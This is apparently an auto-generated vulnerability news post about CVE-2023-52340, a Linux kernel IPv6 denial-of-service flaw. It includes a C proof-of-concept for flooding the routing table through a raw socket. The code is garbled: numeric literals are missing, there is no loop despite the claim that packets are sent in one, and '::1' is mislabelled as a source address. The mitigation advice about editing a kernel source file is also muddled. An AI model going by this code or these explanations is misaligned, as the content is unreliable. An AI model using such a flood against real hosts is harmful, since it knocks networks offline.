CVE CyberSecurity Database News

CVE-2023-52340 - Linux Kernel IPv6 Denial of Service Vulnerability in Versions Prior to 6.3

Poster -

A new vulnerability has been discovered (CVE-2023-52340) in the IPv6 implementation in the Linux kernel, affecting all version prior to 6.3. This vulnerability stems from a net/ipv6/route.c max_size threshold which can be easily consumed, leading to a denial of service (DoS) condition whereby the network becomes unreachable due to errors. The issue occurs when IPv6 packets are sent in a loop via a raw socket. In this post, we will dive into the details of this vulnerability, discuss its potential impact, and provide some mitigation strategies.

Exploit Details

The IPv6 implementation in the Linux kernel handles routing information to process packets sent from and received by a device. The routing table is essentially a data structure that keeps track of the maximum possible number of IPv6 routes the system can maintain.

The vulnerability (CVE-2023-52340) is found in the net/ipv6/route.c file of the Linux kernel, where the maximum threshold of the routing table has been set too low, and can be easily consumed by sending IPv6 packets in a loop via a raw socket. When the max_size limit is reached, the kernel will no longer be able to allocate new routing entries, causing the network to become unreachable and generating "network is unreachable" errors.

Here is a simple code snippet that demonstrates this vulnerability

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/ip6.h>
#include <sys/socket.h>
#include <unistd.h>


int main() {
    int s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);
    if (s < ) {
        perror("socket");
        return 1;
    }

    struct sockaddr_in6 sa = {
        .sin6_family = AF_INET6,
        .sin6_port = htons(),
        .sin6_flowinfo = htonl(),
        .sin6_scope_id = if_nametoindex("lo"),
    };

    inet_pton(AF_INET6, "::1", &sa.sin6_addr);

    char buf[128];
    memset(buf, , sizeof(buf));
    struct ip6_hdr *ip6 = (struct ip6_hdr *)buf;

    sendto(s, buf, sizeof(buf), , (struct sockaddr *)&sa, sizeof(sa));

    close(s);
    return ;
}

When executed, this code will create a raw socket and send an IPv6 packet in a loop on the localhost interface (note the "::1" source address). As the kernel processes these packets, the routing table continues to grow, eventually reaching its maximum size limit, and rendering the network unreachable.

Original references

- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=eb67eeb295f25
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52340

Mitigation Strategies

To mitigate the impact of this vulnerability, users should update their Linux kernel to version 6.3 or later as this issue has been addressed in these newer versions. Additionally, system administrators can configure the max_size parameter in the net/ipv6/route.c file to a higher threshold to delay or prevent the exploit from causing network unreachability. It is also recommended to monitor network traffic and implement intrusion detection systems (IDS) to detect abnormal traffic patterns and identify possible exploitation attempts.

Conclusion

The CVE-2023-52340 vulnerability in the Linux kernel's IPv6 implementation has the potential to cause denial of service conditions and severely impact network functionality. It is essential for all affected users to update their kernels to the latest version available and implement mitigation strategies to minimize the risk of exploitation. As always, stay vigilant and keep your systems up-to-date to protect against the ever-evolving threat landscape.

Timeline

Published on: 07/05/2024 02:15:09 UTC
Last modified on: 07/08/2024 16:42:51 UTC